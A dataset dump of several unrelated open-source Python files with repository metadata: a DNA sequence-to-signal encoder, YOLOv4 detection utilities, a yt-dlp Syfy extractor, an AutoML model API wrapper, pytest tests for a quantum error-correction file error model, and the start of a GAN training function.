signal[0].append(1)
signal[2].append(0)
elif base == 'S' or base == 's':
signal[3].append(1)
signal[1].append(1)
signal[0].append(0)
signal[2].append(0)
elif base == 'W' or base == 'w':
signal[3].append(0)
signal[1].append(0)
signal[0].append(1)
signal[2].append(1)
elif base == 'B' or base == 'b':
signal[3].append(1)
signal[1].append(1)
signal[0].append(0)
signal[2].append(1)
elif base == 'D' or base == 'd':
signal[3].append(0)
signal[1].append(1)
signal[0].append(1)
signal[2].append(1)
elif base == 'H' or base == 'h':
signal[3].append(1)
signal[1].append(0)
signal[0].append(1)
signal[2].append(1)
elif base == 'V' or base == 'v':
signal[3].append(1)
signal[1].append(1)
signal[0].append(1)
signal[2].append(0)
elif base == 'N' or base == 'n':
signal[3].append(1)
signal[1].append(1)
signal[0].append(1)
signal[2].append(1)
elif base == 'X' or base == 'x':
signal[3].append(1)
signal[1].append(1)
signal[0].append(1)
signal[2].append(1)
# *Returning a flattened list.
return merge(signal)
# *Tetrahedron Representation. The formula is taken from the paper <https://dx.doi.org/10.7717%2Fpeerj.4264>
elif type == 'Tetrahedron':
signal = [[],[],[]]
for base in baselist:
if base == 'A' or base == 'a':
signal[0].append(0*math.sqrt(2)/3)
signal[1].append(0*math.sqrt(6)/3)
signal[2].append(3/3)
if base == 'G' or base == 'g':
signal[0].append(-1*math.sqrt(2)/3)
signal[1].append(-1*math.sqrt(6)/3)
signal[2].append(-1/3)
if base == 'T' or base == 't':
signal[0].append(2*math.sqrt(2)/3)
signal[1].append(0*math.sqrt(6)/3)
signal[2].append(-1/3)
if base == 'C' or base == 'c':
signal[0].append(-1*math.sqrt(2)/3)
signal[1].append(1*math.sqrt(6)/3)
signal[2].append(-1/3)
if base == 'U' or base == 'u':
signal[0].append(2*math.sqrt(2)/3)
signal[1].append(0*math.sqrt(6)/3)
signal[2].append(-1/3)
return merge(signal)
# *Integer Representation. (0,1,2,3) ~ (A, T, G, C) respectively.
elif type == 'Integer':
signal = []
for base in baselist:
if base == 'C' or base == 'c':
signal.append(3)
if base == 'G' or base == 'g':
signal.append(2)
if base == 'A' or base == 'a':
signal.append(0)
if base == 'T' or base == 't':
signal.append(1)
if base == 'U' or base == 'u':
signal.append(1)
return signal
# *Real Representation. (-1.5, -0.5, 0.5, 1.5) ~ (A, T, G, C) respectively.
elif type == 'Real':
signal = []
for base in baselist:
if base == 'C' or base == 'c':
signal.append(1.5)
if base == 'G' or base == 'g':
signal.append(0.5)
if base == 'A' or base == 'a':
signal.append(-1.5)
if base == 'T' or base == 't':
signal.append(-0.5)
if base == 'U' or base == 'u':
signal.append(-0.5)
return signal
# *Complex Representation. ((1,1), (1,-1), (-1,1), (-1,-1)) ~ (A, T, G, C) respectively.
elif type == 'Complex':
signal = [[],[]]
for base in baselist:
if base == 'C' or base == 'c':
signal[0].append(-1)
signal[1].append(-1)
if base == 'G' or base == 'g':
signal[0].append(-1)
signal[1].append(1)
if base == 'A' or base == 'a':
signal[0].append(1)
signal[1].append(1)
if base == 'T' or base == 't':
signal[0].append(1)
signal[1].append(-1)
if base == 'U' or base == 'u':
signal[0].append(1)
signal[1].append(-1)
return merge(signal)
# *List to make DNASignal.csv
DNASignal = []
# *Check to see error in choosing representation.
if metric in ['Voss', 'Tetrahedron', 'Integer', 'Real', 'Complex']:
# *Opening dataset.csv with gene sequences.
with open('../../data/interim/dataset.csv', mode='r') as csv_file:
rows = csv.DictReader(csv_file)
# *To check if running properly.
current_class = 'Birds'
print("\nConverting DNA sequences to "+metric+" representation.")
print("---------------------------------------------------------------------------------------------------------------")
print("Converting class of "+current_class+".")
# *Looping through the various gene sequences in dataset.csv.
for row in rows:
if current_class != row['Class']:
current_class = row['Class']
print("Converting class of "+current_class+".")
# *Calling the DNAtoSignal function to generate DNA signal.
signal = DNAtoSignal(row['Gene Sequence'], metric)
# *Making new csv row with 'Signal' key.
data_row = {'Class': row['Class'], 'ID': row['ID'], 'Gene Sequence': row['Gene Sequence'], 'Signal': signal}
DNASignal.append(data_row)
# *Creating the csv at ../../data/processed/DNASignal.csv.
with open('../../data/processed/DNASignal.csv', 'w') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=DNASignal[0].keys())
writer.writeheader()
writer.writerows(DNASignal)
# *Statement signfying end of script.
print("---------------------------------------------------------------------------------------------------------------")
print("Sequences converted and stored at gene-to-signal/data/processed/DNASignal.csv.\n")
# *In case of wrong representation variable.
else:
print("\n---------------------------------------------------------------------------------------------------------------")
print("\nError: Type of representation is not supported. Please check the variable 'metric'.\n")
print("---------------------------------------------------------------------------------------------------------------")
sys.exit() | 39.425101 | 170 | 0.454919 |
4362266424de6b76013b18124be2bcc5cd063452 | 76 | py | Python | engine/model/__init__.py | rahulmadanraju/Semantic-Search-Engine | b0be4b9cdee2362be6c7ac97865c2588a7acdc15 | [
"MIT"
] | 2 | 2020-06-03T11:26:56.000Z | 2020-07-23T11:23:32.000Z | engine/model/__init__.py | rahulmadanraju/Semantic-Search-Engine | b0be4b9cdee2362be6c7ac97865c2588a7acdc15 | [
"MIT"
] | null | null | null | engine/model/__init__.py | rahulmadanraju/Semantic-Search-Engine | b0be4b9cdee2362be6c7ac97865c2588a7acdc15 | [
"MIT"
] | null | null | null | from engine.model.transformers import sentence_embeddings, predict_results
| 25.333333 | 74 | 0.881579 |
64ee140fd3a5dfa235fd7544d5ea51dcf2badd45 | 7,881 | py | Python | tool/utils.py | kndt84/pytorch-YOLOv4 | dfaada3517c5e3bea07f96e0e1e62a003271fa24 | [
"Apache-2.0"
] | null | null | null | tool/utils.py | kndt84/pytorch-YOLOv4 | dfaada3517c5e3bea07f96e0e1e62a003271fa24 | [
"Apache-2.0"
] | null | null | null | tool/utils.py | kndt84/pytorch-YOLOv4 | dfaada3517c5e3bea07f96e0e1e62a003271fa24 | [
"Apache-2.0"
] | null | null | null | import sys
import os
import time
import math
import numpy as np
import cv2
import itertools
import struct # get_image_size
import imghdr # get_image_size
from torch import nn
from torchvision import datasets, models, transforms
from torch.autograd import Variable
from PIL import Image
def extract_feature(img):
model = models.googlenet(pretrained=True)
layers = list(model.children())[:-2]
model = nn.Sequential(*layers, nn.Flatten())
normalize = transforms.Normalize(
mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
preprocess = transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
normalize
])
new_img = np.copy(img)
new_img = cv2.cvtColor(new_img, cv2.COLOR_BGR2RGB)
new_img = Image.fromarray(new_img)
img_tensor = preprocess(new_img)
img_tensor.unsqueeze_(0)
out = model(Variable(img_tensor))
return out.to('cpu').detach().numpy().ravel()
def crop_box(img, box):
img = np.copy(img)
width = img.shape[1]
height = img.shape[0]
x0 = int(box[0] * width)
y0 = int(box[1] * height)
x1 = int(box[2] * width)
y1 = int(box[3] * height)
return img[y0:y1, x0:x1]
def get_bbox_coordinates(img, box):
img = np.copy(img)
width = img.shape[1]
height = img.shape[0]
x0 = int(box[0] * width)
y0 = int(box[1] * height)
x1 = int(box[2] * width)
y1 = int(box[3] * height)
return {'x0':x0, 'y0': y0, 'x1': x1, 'y1': y1}
def sigmoid(x):
return 1.0 / (np.exp(-x) + 1.)
def softmax(x):
x = np.exp(x - np.expand_dims(np.max(x, axis=1), axis=1))
x = x / np.expand_dims(x.sum(axis=1), axis=1)
return x
def bbox_iou(box1, box2, x1y1x2y2=True):
# print('iou box1:', box1)
# print('iou box2:', box2)
if x1y1x2y2:
mx = min(box1[0], box2[0])
Mx = max(box1[2], box2[2])
my = min(box1[1], box2[1])
My = max(box1[3], box2[3])
w1 = box1[2] - box1[0]
h1 = box1[3] - box1[1]
w2 = box2[2] - box2[0]
h2 = box2[3] - box2[1]
else:
w1 = box1[2]
h1 = box1[3]
w2 = box2[2]
h2 = box2[3]
mx = min(box1[0], box2[0])
Mx = max(box1[0] + w1, box2[0] + w2)
my = min(box1[1], box2[1])
My = max(box1[1] + h1, box2[1] + h2)
uw = Mx - mx
uh = My - my
cw = w1 + w2 - uw
ch = h1 + h2 - uh
carea = 0
if cw <= 0 or ch <= 0:
return 0.0
area1 = w1 * h1
area2 = w2 * h2
carea = cw * ch
uarea = area1 + area2 - carea
return carea / uarea
def nms_cpu(boxes, confs, nms_thresh=0.5, min_mode=False):
# print(boxes.shape)
x1 = boxes[:, 0]
y1 = boxes[:, 1]
x2 = boxes[:, 2]
y2 = boxes[:, 3]
areas = (x2 - x1) * (y2 - y1)
order = confs.argsort()[::-1]
keep = []
while order.size > 0:
idx_self = order[0]
idx_other = order[1:]
keep.append(idx_self)
xx1 = np.maximum(x1[idx_self], x1[idx_other])
yy1 = np.maximum(y1[idx_self], y1[idx_other])
xx2 = np.minimum(x2[idx_self], x2[idx_other])
yy2 = np.minimum(y2[idx_self], y2[idx_other])
w = np.maximum(0.0, xx2 - xx1)
h = np.maximum(0.0, yy2 - yy1)
inter = w * h
if min_mode:
over = inter / np.minimum(areas[order[0]], areas[order[1:]])
else:
over = inter / (areas[order[0]] + areas[order[1:]] - inter)
inds = np.where(over <= nms_thresh)[0]
order = order[inds + 1]
return np.array(keep)
def plot_boxes_cv2(img, boxes, savename=None, class_names=None, color=None):
img = np.copy(img)
colors = np.array([[1, 0, 1], [0, 0, 1], [0, 1, 1], [0, 1, 0], [1, 1, 0], [1, 0, 0]], dtype=np.float32)
def get_color(c, x, max_val):
ratio = float(x) / max_val * 5
i = int(math.floor(ratio))
j = int(math.ceil(ratio))
ratio = ratio - i
r = (1 - ratio) * colors[i][c] + ratio * colors[j][c]
return int(r * 255)
width = img.shape[1]
height = img.shape[0]
for i in range(len(boxes)):
box = boxes[i]
x1 = int(box[0] * width)
y1 = int(box[1] * height)
x2 = int(box[2] * width)
y2 = int(box[3] * height)
if color:
rgb = color
else:
rgb = (255, 0, 0)
if len(box) >= 7 and class_names:
cls_conf = box[5]
cls_id = box[6]
print('%s: %f' % (class_names[cls_id], cls_conf))
classes = len(class_names)
offset = cls_id * 123457 % classes
red = get_color(2, offset, classes)
green = get_color(1, offset, classes)
blue = get_color(0, offset, classes)
if color is None:
rgb = (red, green, blue)
img = cv2.putText(img, class_names[cls_id], (x1, y1), cv2.FONT_HERSHEY_SIMPLEX, 1.2, rgb, 1)
img = cv2.rectangle(img, (x1, y1), (x2, y2), rgb, 1)
if savename:
print("save plot results to %s" % savename)
cv2.imwrite(savename, img)
return img
def read_truths(lab_path):
if not os.path.exists(lab_path):
return np.array([])
if os.path.getsize(lab_path):
truths = np.loadtxt(lab_path)
truths = truths.reshape(truths.size / 5, 5) # to avoid single truth problem
return truths
else:
return np.array([])
def load_class_names(namesfile):
class_names = []
with open(namesfile, 'r') as fp:
lines = fp.readlines()
for line in lines:
line = line.rstrip()
class_names.append(line)
return class_names
def post_processing(img, conf_thresh, nms_thresh, output):
# anchors = [12, 16, 19, 36, 40, 28, 36, 75, 76, 55, 72, 146, 142, 110, 192, 243, 459, 401]
# num_anchors = 9
# anchor_masks = [[0, 1, 2], [3, 4, 5], [6, 7, 8]]
# strides = [8, 16, 32]
# anchor_step = len(anchors) // num_anchors
# [batch, num, 1, 4]
box_array = output[0]
# [batch, num, num_classes]
confs = output[1]
t1 = time.time()
if type(box_array).__name__ != 'ndarray':
box_array = box_array.cpu().detach().numpy()
confs = confs.cpu().detach().numpy()
num_classes = confs.shape[2]
# [batch, num, 4]
box_array = box_array[:, :, 0]
# [batch, num, num_classes] --> [batch, num]
max_conf = np.max(confs, axis=2)
max_id = np.argmax(confs, axis=2)
t2 = time.time()
bboxes_batch = []
for i in range(box_array.shape[0]):
argwhere = max_conf[i] > conf_thresh
l_box_array = box_array[i, argwhere, :]
l_max_conf = max_conf[i, argwhere]
l_max_id = max_id[i, argwhere]
bboxes = []
# nms for each class
for j in range(num_classes):
cls_argwhere = l_max_id == j
ll_box_array = l_box_array[cls_argwhere, :]
ll_max_conf = l_max_conf[cls_argwhere]
ll_max_id = l_max_id[cls_argwhere]
keep = nms_cpu(ll_box_array, ll_max_conf, nms_thresh)
if (keep.size > 0):
ll_box_array = ll_box_array[keep, :]
ll_max_conf = ll_max_conf[keep]
ll_max_id = ll_max_id[keep]
for k in range(ll_box_array.shape[0]):
bboxes.append([ll_box_array[k, 0], ll_box_array[k, 1], ll_box_array[k, 2], ll_box_array[k, 3], ll_max_conf[k], ll_max_conf[k], ll_max_id[k]])
bboxes_batch.append(bboxes)
t3 = time.time()
print('-----------------------------------')
print(' max and argmax : %f' % (t2 - t1))
print(' nms : %f' % (t3 - t2))
print('Post processing total : %f' % (t3 - t1))
print('-----------------------------------')
return bboxes_batch
| 27.652632 | 161 | 0.541809 |
c79d27a0de5cac6efb738d035efb4090ca390091 | 2,005 | py | Python | yt_dlp/extractor/syfy.py | olipfei/yt-dlp | 7879e79d11a2e5855167820518df49caf623fe48 | [
"Unlicense"
] | 11 | 2022-01-06T22:09:50.000Z | 2022-03-12T22:26:22.000Z | yt_dlp/extractor/syfy.py | olipfei/yt-dlp | 7879e79d11a2e5855167820518df49caf623fe48 | [
"Unlicense"
] | 4 | 2022-02-25T08:20:18.000Z | 2022-03-17T16:16:20.000Z | yt_dlp/extractor/syfy.py | olipfei/yt-dlp | 7879e79d11a2e5855167820518df49caf623fe48 | [
"Unlicense"
] | 3 | 2022-02-19T08:59:13.000Z | 2022-03-06T16:11:21.000Z | from .adobepass import AdobePassIE
from ..utils import (
update_url_query,
smuggle_url,
)
class SyfyIE(AdobePassIE):
_VALID_URL = r'https?://(?:www\.)?syfy\.com/(?:[^/]+/)?videos/(?P<id>[^/?#]+)'
_TESTS = [{
'url': 'http://www.syfy.com/theinternetruinedmylife/videos/the-internet-ruined-my-life-season-1-trailer',
'info_dict': {
'id': '2968097',
'ext': 'mp4',
'title': 'The Internet Ruined My Life: Season 1 Trailer',
'description': 'One tweet, one post, one click, can destroy everything.',
'uploader': 'NBCU-MPAT',
'upload_date': '20170113',
'timestamp': 1484345640,
},
'params': {
# m3u8 download
'skip_download': True,
},
'add_ie': ['ThePlatform'],
}]
def _real_extract(self, url):
display_id = self._match_id(url)
webpage = self._download_webpage(url, display_id)
syfy_mpx = list(self._parse_json(self._search_regex(
r'jQuery\.extend\(Drupal\.settings\s*,\s*({.+?})\);', webpage, 'drupal settings'),
display_id)['syfy']['syfy_mpx'].values())[0]
video_id = syfy_mpx['mpxGUID']
title = syfy_mpx['episodeTitle']
query = {
'mbr': 'true',
'manifest': 'm3u',
}
if syfy_mpx.get('entitlement') == 'auth':
resource = self._get_mvpd_resource(
'syfy', title, video_id,
syfy_mpx.get('mpxRating', 'TV-14'))
query['auth'] = self._extract_mvpd_auth(
url, video_id, 'syfy', resource)
return {
'_type': 'url_transparent',
'ie_key': 'ThePlatform',
'url': smuggle_url(update_url_query(
self._proto_relative_url(syfy_mpx['releaseURL']), query),
{'force_smil_url': True}),
'title': title,
'id': video_id,
'display_id': display_id,
}
| 35.175439 | 113 | 0.527681 |
d2733611e34b0b364c29ff473b041a44ce553f2b | 26 | py | Python | utils/all.py | QiangZiBro/compass | 30c3d89a69e496185488dd5f596de517f59624fc | [
"Apache-2.0"
] | null | null | null | utils/all.py | QiangZiBro/compass | 30c3d89a69e496185488dd5f596de517f59624fc | [
"Apache-2.0"
] | 1 | 2021-09-23T06:59:23.000Z | 2021-09-23T06:59:23.000Z | utils/all.py | QiangZiBro/compass | 30c3d89a69e496185488dd5f596de517f59624fc | [
"Apache-2.0"
] | null | null | null | import open3d
import torch | 13 | 13 | 0.884615 |
7901f8712e7c9a9d62614608e1db94ba004f877a | 3,488 | py | Python | a2ml/api/auger/model.py | augerai/a2ml | 9d9ce0ac1b51cc81f1cb5ae331c4523131bc6a86 | [
"Apache-2.0"
] | 30 | 2019-07-01T13:23:27.000Z | 2022-03-16T21:19:33.000Z | a2ml/api/auger/model.py | augerai/a2ml | 9d9ce0ac1b51cc81f1cb5ae331c4523131bc6a86 | [
"Apache-2.0"
] | 234 | 2019-07-04T13:56:15.000Z | 2021-11-04T10:12:55.000Z | a2ml/api/auger/model.py | augerai/a2ml | 9d9ce0ac1b51cc81f1cb5ae331c4523131bc6a86 | [
"Apache-2.0"
] | 13 | 2019-07-04T14:00:34.000Z | 2020-07-13T11:18:44.000Z | from .impl.cloud.rest_api import RestApi
from .impl.decorators import with_project
from a2ml.api.utils.decorators import error_handler, authenticated
from .impl.model import Model
from .credentials import Credentials
class AugerModel(object):
def __init__(self, ctx):
self.ctx = ctx
self.credentials = Credentials(ctx).load()
self.ctx.rest_api = RestApi(
self.credentials.api_url, self.credentials.token)
@error_handler
@authenticated
@with_project(autocreate=False)
def deploy(self, project, model_id, locally, review, name, algorithm, score, data_path, metadata=None):
model_id = Model(self.ctx, project).deploy(model_id, locally, review, name, algorithm, score, data_path, metadata)
return {'model_id': model_id}
@error_handler
@authenticated
#@with_project(autocreate=False)
def predict(self, filename, model_id, threshold, locally, data, columns, predicted_at, output,
no_features_in_result, score, score_true_data):
if locally:
self.deploy(model_id, locally, review=False, name=None, algorithm=None, score=None, data_path=None)
predicted = Model(self.ctx, project=None).predict(
filename, model_id, threshold, locally, data, columns, predicted_at, output,
no_features_in_result, score, score_true_data)
if filename:
self.ctx.log('Predictions stored in %s' % predicted)
if isinstance(predicted, dict) and 'predicted' in predicted:
return predicted
return {'predicted': predicted}
@error_handler
@authenticated
@with_project(autocreate=False)
def actuals(self, project, model_id, filename=None, data=None, columns=None, actuals_at=None, actual_date_column=None, locally=False):
return Model(self.ctx, project).actuals(model_id, filename, data, columns, actuals_at, actual_date_column, locally)
@error_handler
@authenticated
@with_project(autocreate=False)
def delete_actuals(self, project, model_id, with_predictions=False, begin_date=None, end_date=None, locally=False):
return Model(self.ctx, project).delete_actuals(model_id, with_predictions, begin_date, end_date, locally)
@error_handler
@authenticated
@with_project(autocreate=False)
def review_alert(self, project, model_id, parameters, name):
return Model(self.ctx, project).review_alert(model_id, parameters, name)
@error_handler
@authenticated
@with_project(autocreate=False)
def build_review_data(self, project, model_id, locally, output):
return Model(self.ctx, project).build_review_data(model_id, locally, output)
@error_handler
@authenticated
@with_project(autocreate=False)
def review(self, project, model_id):
return Model(self.ctx, project).review(model_id)
@error_handler
@authenticated
@with_project(autocreate=False)
def undeploy(self, project, model_id, locally):
Model(self.ctx, project).undeploy(model_id, locally)
return {'model_id': model_id}
@error_handler
@authenticated
#@with_project(autocreate=False)
def get_info(self, model_id, locally):
return Model(self.ctx, project=None).get_info(model_id, locally)
@error_handler
@authenticated
#@with_project(autocreate=False)
def update(self, model_id, metadata, locally):
return Model(self.ctx, project=None).update(model_id, metadata, locally)
| 38.32967 | 138 | 0.711869 |
6852f14a0a4865116686058f45d93848e7050de2 | 7,481 | py | Python | tests/models/test_generic_file_error_model.py | dua-arpit/qecsim | 70ded606a653fd96d517e07fbba15d9b755df752 | [
"BSD-3-Clause"
] | 35 | 2021-02-08T08:32:54.000Z | 2022-03-22T05:35:06.000Z | tests/models/test_generic_file_error_model.py | dua-arpit/qecsim | 70ded606a653fd96d517e07fbba15d9b755df752 | [
"BSD-3-Clause"
] | 2 | 2021-08-05T06:10:35.000Z | 2021-08-20T12:44:10.000Z | tests/models/test_generic_file_error_model.py | dua-arpit/qecsim | 70ded606a653fd96d517e07fbba15d9b755df752 | [
"BSD-3-Clause"
] | 7 | 2021-02-11T17:32:47.000Z | 2021-11-30T12:34:41.000Z | import math
import os
import numpy as np
import pytest
from click.testing import CliRunner # use for isolated_filesystem feature
from qecsim import app
from qecsim import paulitools as pt
from qecsim.models.basic import FiveQubitCode
from qecsim.models.generic import FileErrorModel
from qecsim.models.rotatedplanar import RotatedPlanarCode, RotatedPlanarMPSDecoder
FILES_DIR = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'test_generic_file_error_model_files')
@pytest.mark.parametrize('filename, start', [
(os.path.join(FILES_DIR, 'fivequbitcode-errors-p0.4-bias10.jsonl'), 0),
(os.path.join(FILES_DIR, 'fivequbitcode-errors-p0.4-bias10.jsonl'), 3),
])
def test_file_error_model_init(filename, start):
FileErrorModel(filename, start) # no error raised
@pytest.mark.parametrize('filename, start', [
(os.path.join(FILES_DIR, 'fivequbitcode-errors-p0.4-bias10.jsonl'), 'blah'),
(os.path.join(FILES_DIR, 'fivequbitcode-errors-p0.4-bias10.jsonl'), -1),
(os.path.join(FILES_DIR, 'fivequbitcode-errors-p0.4-bias10.jsonl'), 0.4),
(None, 0),
])
def test_file_error_model_init_invalid_parameters(filename, start):
with pytest.raises((ValueError, TypeError), match=r"^FileErrorModel") as exc_info:
FileErrorModel(filename, start) # expected error raised
print(exc_info)
@pytest.mark.parametrize('filename', [
"this_file_does_not_exist.txt",
"this_one_also.json",
"and_this_one",
])
def test_file_error_model_file_not_found(filename):
with pytest.raises(FileNotFoundError):
FileErrorModel(filename)
def test_file_error_model_init_default_parameters():
FileErrorModel(os.path.join(FILES_DIR, 'fivequbitcode-errors-p0.4-bias10.jsonl')) # no error raised
def test_file_error_model_init_extra_header():
fem = FileErrorModel(os.path.join(FILES_DIR, 'fivequbitcode-errors-p0.4-bias10.jsonl'))
assert fem.bias == 10
@pytest.mark.parametrize('filename', [
os.path.join(FILES_DIR, 'invalid-extra-header-1.jsonl'),
os.path.join(FILES_DIR, 'invalid-extra-header-2.jsonl'),
os.path.join(FILES_DIR, 'invalid-extra-header-3.jsonl'),
os.path.join(FILES_DIR, 'invalid-extra-header-4.jsonl'),
])
def test_file_error_model_init_invalid_extra_headers(filename):
with pytest.raises(ValueError):
FileErrorModel(filename)
def test_file_error_model_probability_distribution():
fem = FileErrorModel(os.path.join(FILES_DIR, 'fivequbitcode-errors-p0.4-bias10.jsonl'))
pd = fem.probability_distribution(fem._probability)
assert isinstance(pd, tuple)
assert len(pd) == 4
assert pd[0] + pd[1] + pd[2] + pd[3] == 1
def test_file_error_model_generate():
fem = FileErrorModel(os.path.join(FILES_DIR, 'fivequbitcode-errors-p0.4-bias10.jsonl'))
fqc = FiveQubitCode()
for _ in range(10):
error = fem.generate(fqc, 0.4)
assert isinstance(error, np.ndarray)
assert len(error) == 10
def test_file_error_model_generate_skip_to_start():
print()
fem = FileErrorModel(os.path.join(FILES_DIR, 'fivequbitcode-errors-p0.4-bias10.jsonl'), 4)
fqc = FiveQubitCode()
packed_errors = (
pt.pack(fem.generate(fqc, 0.4)),
pt.pack(fem.generate(fqc, 0.4)),
pt.pack(fem.generate(fqc, 0.4)),
)
expected_packed_errors = (("8400", 10), ("5280", 10), ("1080", 10))
assert packed_errors == expected_packed_errors
@pytest.mark.parametrize('filename', [
os.path.join(FILES_DIR, 'invalid_line1.jsonl'),
os.path.join(FILES_DIR, 'invalid_line2.jsonl'),
os.path.join(FILES_DIR, 'invalid_line3.jsonl'),
os.path.join(FILES_DIR, 'repeated_dic_key.jsonl'),
os.path.join(FILES_DIR, 'invalid_structure1.jsonl'),
os.path.join(FILES_DIR, 'invalid_structure2.jsonl'),
os.path.join(FILES_DIR, 'no_prob_in_header.jsonl'),
os.path.join(FILES_DIR, 'no_label_in_header.jsonl'),
])
def test_file_error_model_invalid_file_header(filename):
with pytest.raises(ValueError):
FileErrorModel(filename)
def test_file_error_model_probability_distribution_invalid_probability_parameter():
fem = FileErrorModel(os.path.join(FILES_DIR, 'fivequbitcode-errors-p0.4-bias10.jsonl'))
with pytest.raises(ValueError):
fem.probability_distribution(0.3)
def test_file_error_model__probability_distribution_no_probability_distribution_in_header():
fem = FileErrorModel(os.path.join(FILES_DIR, 'no_probability_distribution.jsonl'))
with pytest.raises(ValueError):
fem.probability_distribution(0.4)
def test_file_error_model_generate_invalid_probability_parameter():
fem = FileErrorModel(os.path.join(FILES_DIR, 'fivequbitcode-errors-p0.4-bias10.jsonl'))
fqc = FiveQubitCode()
with pytest.raises(ValueError):
fem.generate(fqc, 0.3)
def test_file_error_model_generate_invalid_error_lines():
fem = FileErrorModel(os.path.join(FILES_DIR, 'header_lines_after_body_lines.jsonl'))
fqc = FiveQubitCode()
with pytest.raises(ValueError):
fem.generate(fqc, 0.4)
fem.generate(fqc, 0.4)
def test_file_error_model_generate_no_more_errors_available():
fem = FileErrorModel(os.path.join(FILES_DIR, 'no_more_errors_available.jsonl'))
fqc = FiveQubitCode()
with pytest.raises(EOFError):
fem.generate(fqc, 0.4)
fem.generate(fqc, 0.4)
fem.generate(fqc, 0.4)
def test_file_error_model_generate_no_more_errors_available_skip_to_start():
fem = FileErrorModel(os.path.join(FILES_DIR, 'no_more_errors_available.jsonl'), 1)
fqc = FiveQubitCode()
with pytest.raises(EOFError):
fem.generate(fqc, 0.4)
fem.generate(fqc, 0.4)
@pytest.mark.parametrize('filename', [
os.path.join(FILES_DIR, 'incorrect_length_in_packed_error.jsonl'),
os.path.join(FILES_DIR, 'incorrect_length_in_packed_error2.jsonl')
])
def test_file_error_model_generate_incorrect_length_in_packed_error(filename):
fem = FileErrorModel(filename)
fqc = FiveQubitCode()
with pytest.raises(ValueError):
fem.generate(fqc, 0.4)
# TESTS FOR GENERATED SAMPLES BELOW
@pytest.mark.parametrize('code, filename, decoder', [
(RotatedPlanarCode(5, 5),
os.path.join(FILES_DIR, 'rotated_planar_code_size_5_J_0.1_p_2.jsonl'),
RotatedPlanarMPSDecoder(chi=8)),
(RotatedPlanarCode(5, 5),
os.path.join(FILES_DIR, 'rotated_planar_code_size_5_J_0.1_p_4.jsonl'),
RotatedPlanarMPSDecoder(chi=8)),
(RotatedPlanarCode(5, 5),
os.path.join(FILES_DIR, 'rotated_planar_code_size_5_J_0.1_p_6.jsonl'),
RotatedPlanarMPSDecoder(chi=8)),
])
def test_file_error_model_generated_sample_error_probability(code, filename, decoder):
with CliRunner().isolated_filesystem(): # isolate from logging_qecsim.ini
# error model and probability from sample
error_model = FileErrorModel(filename, start=1000)
e_prob = error_model._probability
# runs (repeat many times to ensure physical_error_rate is close to error_probability)
max_runs = 100
data = app.run(code, error_model, decoder, e_prob, max_runs) # no error raised
p_rate = data['physical_error_rate']
p_var = data['error_weight_pvar'] / (data['n_k_d'][0] ** 2) # physical_error_rate_pvar (power of 2 is correct)
p_std = math.sqrt(p_var) # physical_error_rate_std
assert p_rate - p_std < e_prob < p_rate + p_std, (
'physical_error_rate={} is not within 1 std={} of error_probability={}'.format(p_rate, p_std, e_prob))
| 38.761658 | 119 | 0.730918 |
b9579098cdd1fea8e338f54a90889cf5d220e683 | 829 | py | Python | nlu/components/classifiers/multi_classifier/multi_classifier.py | UPbook-innovations/nlu | 2ae02ce7b6ca163f47271e98b71de109d38adefe | [
"Apache-2.0"
] | 1 | 2021-05-01T01:23:18.000Z | 2021-05-01T01:23:18.000Z | nlu/components/classifiers/multi_classifier/multi_classifier.py | sheerinZ/nlu | a223eee4b077a6b832f47e5e6125167fe0922687 | [
"Apache-2.0"
] | 2 | 2021-09-28T05:55:05.000Z | 2022-02-26T11:16:21.000Z | nlu/components/classifiers/multi_classifier/multi_classifier.py | atdavidpark/nlu | 619d07299e993323d83086c86506db71e2a139a9 | [
"Apache-2.0"
] | 1 | 2021-09-13T10:06:20.000Z | 2021-09-13T10:06:20.000Z | import nlu.pipe_components
import sparknlp
from sparknlp.annotator import *
class MultiClassifier:
@staticmethod
def get_default_model():
return MultiClassifierDLModel.pretrained() \
.setInputCols("sentence_embeddings") \
.setOutputCol("category")
@staticmethod
def get_pretrained_model(name, language):
return MultiClassifierDLModel.pretrained(name,language) \
.setInputCols("sentence_embeddings") \
.setOutputCol("multi_category")
@staticmethod
def get_default_trainable_model():
return MultiClassifierDLApproach() \
.setInputCols("sentence_embeddings") \
.setOutputCol("multi_category") \
.setLabelColumn("y") \
.setEnableOutputLogs(True) \
.setMaxEpochs(2) \
| 28.586207 | 65 | 0.652593 |
ff8b6c1575ed131d073caed9b536724f74da7cb3 | 72 | py | Python | quiz/main.py | bschandramohan/PyConnect | bfd5acc13b5fd5a83be14706032be2cf70d4d05a | [
"MIT"
] | 1 | 2021-10-11T04:34:25.000Z | 2021-10-11T04:34:25.000Z | quiz/main.py | bschandramohan/PyConnect | bfd5acc13b5fd5a83be14706032be2cf70d4d05a | [
"MIT"
] | null | null | null | quiz/main.py | bschandramohan/PyConnect | bfd5acc13b5fd5a83be14706032be2cf70d4d05a | [
"MIT"
] | null | null | null | from quiz.quiz_game import QuizGame
game = QuizGame()
game.play_game()
| 14.4 | 35 | 0.777778 |
3ee1234f52d2b19e1dbfe176ee3d32b5b789f2b8 | 5,078 | py | Python | src/gan_training.py | saattrupdan/gan | 68443884c7b4cf2527254d63145549de1f4ae525 | [
"MIT"
] | null | null | null | src/gan_training.py | saattrupdan/gan | 68443884c7b4cf2527254d63145549de1f4ae525 | [
"MIT"
] | null | null | null | src/gan_training.py | saattrupdan/gan | 68443884c7b4cf2527254d63145549de1f4ae525 | [
"MIT"
] | null | null | null | import torch
from torch import nn
from torch import optim
from torch.utils.data import DataLoader
from torch.utils.data import TensorDataset
from torch.utils.tensorboard import SummaryWriter
import itertools as it
from pathlib import Path
from tqdm.auto import tqdm
from typing import Union
import os
import time
from models import RGAN
def train_gan(gan: RGAN, dataloader: DataLoader, lr: float = 3e-4,
lr_reduction_factor: float = 1., lr_reduction_step: int = 10,
l2_reg: float = 0., optimiser: type = optim.AdamW,
epochs: Union[int, None] = None, model_name: str = 'walmart_gan',
datadir: str = '.data', random_seed: int = 42,
tensorboard_run: str = 'loss') -> RGAN:
# Set random seed
if random_seed is not None: torch.manual_seed(random_seed)
# Initialise tensorboard
writer= SummaryWriter()
os.system('tensorboard --logdir runs &')
time.sleep(4)
# Set up optimiser and scheduler for the critic
c_optim = optimiser(gan.crt.parameters(), lr = lr)
c_sched = optim.lr_scheduler.StepLR(
c_optim,
step_size = lr_reduction_step,
gamma = lr_reduction_factor
)
